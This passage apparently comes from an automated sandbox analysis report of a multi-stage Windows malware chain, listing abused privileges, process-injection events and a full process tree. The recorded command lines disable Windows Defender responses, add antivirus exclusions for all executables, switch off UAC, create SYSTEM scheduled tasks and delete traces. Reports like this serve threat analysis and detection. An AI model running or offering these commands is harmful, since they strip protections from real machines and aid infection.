| Token: SeIncBasePriorityPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeCreatePagefilePrivilege | 4644 | WMIC.exe | 2 |
| Token: SeBackupPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeRestorePrivilege | 4644 | WMIC.exe | 2 |
| Token: SeShutdownPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeDebugPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeSystemEnvironmentPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeRemoteShutdownPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeUndockPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeManageVolumePrivilege | 4644 | WMIC.exe | 2 |
| Token: 33 | 4644 | WMIC.exe | 2 |
| Token: 34 | 4644 | WMIC.exe | 2 |
| Token: 35 | 4644 | WMIC.exe | 2 |
| Token: 36 | 4644 | WMIC.exe | 2 |
| Token: SeDebugPrivilege | 5544 | powershell.exe | 1 |
| Token: SeDebugPrivilege | 2288 | powershell.exe | 1 |
| Token: SeDebugPrivilege | 1988 | powershell.exe | 1 |
| Token: SeDebugPrivilege | 1164 | powershell.EXE | 1 |
| Token: SeDebugPrivilege | 5676 | InstallUtil.exe | 1 |
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
| pid | process |
| --- | --- |
| 4736 | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe |
| 4996 | 7GB8EE4ovuV7PRbpqsq3NaNR.exe |
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
| pid | process |
| --- | --- |
| 4996 | 7GB8EE4ovuV7PRbpqsq3NaNR.exe |
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
| description | pid | process | target process | events |
| --- | --- | --- | --- | --- |
| PID 4736 wrote to memory of 4744 | 4736 | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe | explortu.exe | 3 |
| PID 4744 wrote to memory of 2184 | 4744 | explortu.exe | explortu.exe | 3 |
| PID 4744 wrote to memory of 3596 | 4744 | explortu.exe | 428002730b.exe | 3 |
| PID 3596 wrote to memory of 3160 | 3596 | 428002730b.exe | axplont.exe | 3 |
| PID 4744 wrote to memory of 3416 | 4744 | explortu.exe | 7c602150df.exe | 3 |
| PID 3160 wrote to memory of 2364 | 3160 | axplont.exe | 33333.exe | 3 |
| PID 2364 wrote to memory of 1408 | 2364 | 33333.exe | RegAsm.exe | 3 |
| PID 2364 wrote to memory of 3744 | 2364 | 33333.exe | RegAsm.exe | 8 |
| PID 3160 wrote to memory of 2028 | 3160 | axplont.exe | fileosn.exe | 3 |
| PID 3744 wrote to memory of 2592 | 3744 | RegAsm.exe | svhoost.exe | 3 |
| PID 3744 wrote to memory of 4856 | 3744 | RegAsm.exe | One.exe | 2 |
| PID 3160 wrote to memory of 2328 | 3160 | axplont.exe | lumma1234.exe | 3 |
| PID 2328 wrote to memory of 816 | 2328 | lumma1234.exe | RegAsm.exe | 3 |
| PID 2328 wrote to memory of 4168 | 2328 | lumma1234.exe | RegAsm.exe | 9 |
| PID 3160 wrote to memory of 4936 | 3160 | axplont.exe | gold.exe | 3 |
| PID 4936 wrote to memory of 764 | 4936 | gold.exe | RegAsm.exe | 9 |
System policy modification 1 TTPs 1 IoCs
Processes:
| description | ioc | process |
| --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file300un.exe |
Processes

[depth 1] C:\Users\Admin\AppData\Local\Temp\6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory

[depth 2] C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

[depth 3] C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

[depth 3] C:\Users\Admin\1000004002\428002730b.exe
  Command line: "C:\Users\Admin\1000004002\428002730b.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

[depth 4] C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

[depth 5] C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

[depth 7] C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
  Command line: "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
  Command line: "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

[depth 8] C:\Windows\SysWOW64\choice.exe
  Command line: choice /C Y /N /D Y /T 3

[depth 6] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 304
  - Program crash

[depth 5] C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 5] C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[depth 5] C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[depth 6] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 292
  - Program crash

[depth 5] C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses

[depth 7] C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

[depth 8] C:\Windows\SysWOW64\timeout.exe
  Command line: timeout /t 5
  - Delays execution with timeout.exe

[depth 5] C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
  - UAC bypass
  - Windows security bypass
  - Executes dropped EXE
  - Windows security modification
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification

[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\Pictures\aVQ0bCqrBKF4mc5oy5N4ZcJW.exe
  Command line: "C:\Users\Admin\Pictures\aVQ0bCqrBKF4mc5oy5N4ZcJW.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

[depth 8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

[depth 9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

[depth 8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

[depth 8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
  - Checks SCSI registry key(s)

[depth 7] C:\Users\Admin\Pictures\50GOjmdgQviYZtho8Vpb8ZVk.exe
  Command line: "C:\Users\Admin\Pictures\50GOjmdgQviYZtho8Vpb8ZVk.exe" /s
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\Pictures\7GB8EE4ovuV7PRbpqsq3NaNR.exe
  Command line: "C:\Users\Admin\Pictures\7GB8EE4ovuV7PRbpqsq3NaNR.exe"
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

[depth 7] C:\Users\Admin\Pictures\PPSVNmeA5Lq8uO8faTZH5Y7p.exe
  Command line: "C:\Users\Admin\Pictures\PPSVNmeA5Lq8uO8faTZH5Y7p.exe"
  - Executes dropped EXE

[depth 8] C:\Users\Admin\AppData\Local\Temp\7zSF121.tmp\Install.exe
  Command line: .\Install.exe
  - Executes dropped EXE

[depth 9] C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe
  Command line: .\Install.exe /NQHxdidUQs "385118" /S
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Enumerates system info in registry

[depth 10] C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[depth 11] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

[depth 12] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[depth 13] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[depth 11] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

[depth 12] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[depth 13] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[depth 11] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

[depth 12] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[depth 13] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[depth 11] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

[depth 12] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[depth 13] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[depth 11] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[depth 12] C:\Windows\SysWOW64\cmd.exe
  Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

[depth 13] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 14] C:\Windows\SysWOW64\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force

[depth 10] C:\Windows\SysWOW64\forfiles.exe
  Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

[depth 11] C:\Windows\SysWOW64\cmd.exe
  Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 13] C:\Windows\SysWOW64\Wbem\WMIC.exe
  Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
  - Suspicious use of AdjustPrivilegeToken

[depth 10] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 03:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe\" 1g /RPqdidZnyf 385118 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

[depth 10] C:\Windows\SysWOW64\forfiles.exe
  Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"

[depth 11] C:\Windows\SysWOW64\cmd.exe
  Command line: /C schtasks /run /I /tn bqGGCwwWIommTRgeuN

[depth 12] \??\c:\windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn bqGGCwwWIommTRgeuN

[depth 10] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 1080
  - Program crash

[depth 7] C:\Users\Admin\Pictures\9J1eQpa2VXXz30Zr9qHarAe1.exe
  Command line: "C:\Users\Admin\Pictures\9J1eQpa2VXXz30Zr9qHarAe1.exe"
  - Modifies firewall policy service
  - Windows security bypass
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Windows security modification
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

[depth 3] C:\Users\Admin\AppData\Local\Temp\1000005001\7c602150df.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1000005001\7c602150df.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2364 -ip 2364

[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4936 -ip 4936

[depth 1] C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

[depth 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

[depth 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

[depth 1] C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe 1g /RPqdidZnyf 385118 /S
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

[depth 2] C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[depth 3] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 6] C:\Windows\SysWOW64\gpupdate.exe
  Command line: "C:\Windows\system32\gpupdate.exe" /force

[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
